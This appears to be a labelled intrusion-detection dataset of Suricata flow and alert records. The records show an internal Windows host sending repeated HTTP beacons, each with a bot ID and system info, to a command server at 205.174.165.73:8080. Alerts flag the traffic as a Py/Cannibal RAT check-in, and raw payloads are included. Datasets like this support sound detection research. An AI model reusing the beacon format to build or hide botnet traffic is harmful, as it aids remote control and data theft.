'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobblAAIAGT2fAqAoPza6lScvJH5Ca9FkKQRyR11ARAQC+1wAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,898
192.168.10.15-52170-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4023581, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:09:11
55,712
Friday
[{'timestamp': '2017-07-07T13:09:11.331006+0000', 'flow_id': 28465029396110, 'pcap_cnt': 4023581, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52170, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:11.276110+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobb5AAIAGT2LAqAoPza6lScvKH5AI2RAWXcW/slARAQBPYgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:09:11.331006+0000', 'flow_id': 28465029396110, 'pcap_cnt': 4023581, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52170, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:11.276110+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobb5AAIAGT2LAqAoPza6lScvKH5AI2RAWXcW/slARAQBPYgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,907
192.168.10.15-52171-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4024412, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:09:21
69,700
Friday
[{'timestamp': '2017-07-07T13:09:21.405565+0000', 'flow_id': 2104738120278606, 'pcap_cnt': 4024412, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52171, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:21.336462+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobcNAAIAGT13AqAoPza6lScvLH5AGapWq6qjMSVARAQAywQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:09:21.405565+0000', 'flow_id': 2104738120278606, 'pcap_cnt': 4024412, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52171, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:21.336462+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobcNAAIAGT13AqAoPza6lScvLH5AGapWq6qjMSVARAQAywQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,927
192.168.10.15-52172-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4025685, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:09:31
65,741
Friday
[{'timestamp': '2017-07-07T13:09:31.463947+0000', 'flow_id': 1977448175179410, 'pcap_cnt': 4025685, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52172, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:31.398994+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobchAAIAGT1jAqAoPza6lScvMH5AHexz8izlaL1ARAQB75wAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:09:31.463947+0000', 'flow_id': 1977448175179410, 'pcap_cnt': 4025685, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52172, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:31.398994+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobchAAIAGT1jAqAoPza6lScvMH5AHexz8izlaL1ARAQB75wAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,972
192.168.10.15-52173-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4026197, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:09:41
61,295
Friday
[{'timestamp': '2017-07-07T13:09:41.522066+0000', 'flow_id': 1093264733440797, 'pcap_cnt': 4026197, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52173, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:41.461597+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobc1AAIAGT1PAqAoPza6lScvNH5BAyKXR77zd91ARAQDRdwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:09:41.522066+0000', 'flow_id': 1093264733440797, 'pcap_cnt': 4026197, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52173, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:41.461597+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobc1AAIAGT1PAqAoPza6lScvNH5BAyKXR77zd91ARAQDRdwAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,991
192.168.10.15-52174-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4029407, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:09:51
73,243
Friday
[{'timestamp': '2017-07-07T13:09:51.596888+0000', 'flow_id': 806369508720579, 'pcap_cnt': 4029407, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52174, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:51.524227+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobdJAAIAGT07AqAoPza6lScvOH5BTzKUUTzLzo1ARAQBKDgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:09:51.596888+0000', 'flow_id': 806369508720579, 'pcap_cnt': 4029407, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52174, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:51.524227+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobdJAAIAGT07AqAoPza6lScvOH5BTzKUUTzLzo1ARAQBKDgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,237,072
192.168.10.9-1998-205.174.165.73-8080-6
['flow', 'http']
